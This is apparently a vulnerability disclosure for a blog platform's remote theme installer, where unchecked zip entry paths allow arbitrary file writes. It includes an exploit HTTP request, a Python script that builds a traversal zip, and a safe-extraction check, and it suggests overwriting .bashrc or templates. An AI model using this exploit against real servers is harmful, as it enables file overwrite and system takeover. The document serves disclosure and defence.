When installing a theme, we can choose to download and install it from a remote HTTP address.
The downloaded zip file is decompressed without any verification of the entry paths, so an entry can be written to any path on any operating system. This is very dangerous: it can allow a malicious user to obtain operating system permissions.
First, make an evil zip file using Python code like this:
Then start an HTTP service hosting the zip and use the theme installation feature to start the installation:
POST /api/admin/themes/fetching?uri=http:%2F%2F127.0.0.1:2333/evil-foo.zip HTTP/1.1
Host: 100.101.61.13:8090
Content-Length: 0
Admin-Authorization: 6ccadd335f0d4719a9418c0b16cfdc99
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Origin: http://100.101.61.13:8090
Referer: http://100.101.61.13:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Then you can see that our file test.txt is decompressed to the /tmp directory.
Therefore, the attacker can overwrite any file writable by the user the server runs as, such as .ftl template files or the .bashrc in that user's home directory, and finally obtain operating system permissions.
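The zip from the first step and the entry-path check that the report says the extractor lacks, as an added Python example (this is not the reporter's script, which is not reproduced on the page, and not the project's own extraction code). The theme directory `/srv/halo/templates/themes`, the entry names and the payload contents are assumed for illustration; the escaping entry `../../../../tmp/test.txt` matches the test.txt-in-/tmp result described above.

```python
"""Added example, not the original report's code: build a zip whose entry
name escapes the extraction directory, then show the path check a
vulnerable extractor is missing. Paths, names and payloads are assumed."""
import io
import os
import zipfile


def build_evil_zip(escape_path="../../../../tmp/test.txt", payload=b"pwned\n"):
    """Return bytes of a zip with one benign entry and one traversal entry.

    zipfile.writestr() does not sanitise entry names, so '../' segments or a
    leading '/' survive into the archive exactly as given (extractall() would
    strip them on the way out, but a Java or C extractor that joins the raw
    name onto the destination directory would not).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("theme.yaml", b"name: evil-foo\n")  # looks like a theme
        zf.writestr(escape_path, payload)               # escapes dest dir
    return buf.getvalue()


def traversal_entries(zip_bytes, dest):
    """Return entry names that would land outside `dest` if the extractor
    did os.path.join(dest, name) with no further checks (the bug described
    in the report). realpath() resolves '..', absolute names and symlinks;
    commonpath() avoids the '/themes' vs '/themes2' prefix pitfall."""
    root = os.path.realpath(dest)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                bad.append(name)
    return bad


def safe_extract(zip_bytes, dest):
    """Extract only if every entry stays under `dest`; return written names.

    Rejects the whole archive on the first escaping entry rather than
    skipping it: a theme that tries to escape is itself an attack signal,
    and a partially installed theme is not worth keeping."""
    bad = traversal_entries(zip_bytes, dest)
    if bad:
        raise ValueError("zip entry escapes destination: %r" % (bad,))
    root = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(root, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


if __name__ == "__main__":
    data = build_evil_zip()
    with open("evil-foo.zip", "wb") as f:   # serve this over HTTP for step 2
        f.write(data)
    theme_dir = "/srv/halo/templates/themes"  # assumed theme directory
    print("escaping entries:", traversal_entries(data, theme_dir))
```

Serving `evil-foo.zip` with `python3 -m http.server 2333` reproduces the request shown above; running `safe_extract` instead of a raw join-and-write rejects the archive before anything is written.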